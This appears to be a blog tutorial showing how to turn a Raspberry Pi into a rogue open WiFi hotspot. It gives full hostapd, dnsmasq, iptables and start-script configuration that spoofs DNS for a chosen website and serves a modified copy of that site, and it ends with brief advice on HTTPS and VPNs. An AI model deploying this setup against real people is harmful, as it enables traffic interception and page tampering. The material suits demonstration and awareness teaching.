Recently I was demonstrating the dangers of public WiFi, or indeed any untrusted network. Regardless of whether the WiFi has a password or not, the owner of the wireless access points can read, inspect and modify all the data you send over the connection.
To best demonstrate this I set up a rogue WiFi hotspot using a Raspberry Pi 3. The Raspberry Pi was setup to do 4 things:
- Act as a WiFi hotspot broadcasting a wireless network that did not have a password.
- Respond to DNS requests from all clients connected to it’s WiFi and had DNS server information obtained by DHCP.
- Return the access points IP address when a client requested the IP address of a well known website.
- Run a web server that returns a modified version of the well known website.
Below I take you through the installation and configuration steps necessary to achieve this.
I used Arch Linux on the Raspberry Pi 3 and so it is necessary to follow the ARMv7 installation instructions at https://archlinuxarm.org/platforms/armv8/broadcom/raspberry-pi-3 before continuing.
SSH into the Raspberry Pi using the alarm user with password alarm, change both root and alarm user passwords. (See https://wiki.archlinux.org/index.php/Users_and_groups for those unfamiliar with Arch Linux).
For convenience and security it is recommended to disable password authentication and enable public key authentication. (see https://wiki.archlinux.org/index.php/Secure_Shell#Force_public_key_authentication for those unfamiliar with Arch Linux)
Prepare the Raspberry Pi by executing the following commands as root (using su, see here for more information for those unfamiliar with su).
NOTE: Confirm any prompts that you receive
pacman -Syu groupadd sudo usermod -aG sudo alarm pacman -S --needed base-devel pacman -S git-core nodejs npm dnsmasq hostapd screen wget
At this point logout and log back in and you should be able to prefix commands that need root privileges with sudo
Create a directory called wifi
mkdir wifi cd wifi/
create a file called hostapd.conf, in the current directory and populate it’s contents with the following:
beacon_int=100 ssid=Public-Hotspot interface=wlan0 driver=nl80211 channel=1 ignore_broadcast_ssid=0 ap_isolate=0 hw_mode=g logger_stdout=-1 logger_stdout_level=0
create a file called dnsmasq.conf, in the current directory and populate it’s contents with the following:
# Configuration file for dnsmasq. port=53 domain-needed bogus-priv server=18.104.22.168 server=22.214.171.124 address=/example.com/192.168.30.1 interface=wlan0 dhcp-range=192.168.30.2,192.168.30.253,255.255.255.0,60m dhcp-option=vendor:MSFT,2,1i log-queries log-dhcp log-facility=/var/log/dnsmasq.log
NOTE: Replace line 8 with whatever website you wish to redirect to the Pi for modification.
Now we need to update the system to use our local DNS server
sudo systemctl disable systemd-resolved sudo systemctl stop systemd-resolved sudo rm /etc/resolv.conf sudo touch /etc/resolv.conf
modify /etc/resolv.conf so it’s contents are as follows:
nameserver 127.0.0.1 nameserver 126.96.36.199
modify hostapd.conf and dnsmasq.conf to suit your needs and then you’re almost ready.
create a file called start_ap.sh in the current directory and make it executable. Populate it’s contents with the following:
#!/bin/bash ip link set up dev wlan0 ip addr add 192.168.30.1/24 broadcast 192.168.30.255 dev wlan0 hostapd ./hostapd.conf & sysctl net.ipv4.ip_forward=1 iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE iptables -P FORWARD ACCEPT iptables -A FORWARD -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT iptables -I INPUT -p udp --dport 67 -i wlan0 -j ACCEPT iptables -I INPUT -p udp --dport 53 -s 192.168.30.0/24 -j ACCEPT iptables -I INPUT -p tcp --dport 53 -s 192.168.30.0/24 -j ACCEPT dnsmasq -C ./dnsmasq.conf cd example.com/ node server.js & cd ..
Optionally now download an example modified page for the example.com:
wget https://lanphier.co.uk/wp-content/uploads/2016/12/example.tar.gz tar -xzvf example.tar.gz cd example.com/ npm install cd ..
You can now start the wifi hotspot using the following:
#start the WiFi sudo ./start_ap.sh
As soon as you disconnect from the SSH then the processes launched to create the AP and node server will be terminated. To prevent this run the start wifi command inside of a screen session:
screen -S wifi sudo ./start_ap.sh
You can detach from the screen by pressing ctrl+a and then ctrl+d. To reattach to the screen at a later date then SSH onto the Raspberry Pi and type
screen -x wifi
Protect against rogue hotspots
Any websites that use HTTPS should create a secure channel that the hotspot cannot read, however the hotspots will still be able to see that you are connecting to those secure sites though they will not be able to see the data you exchange.
The best possible protection is to use a VPN. This creates a secure tunnel to a third party and so all your traffic is secure against the hotspot owner.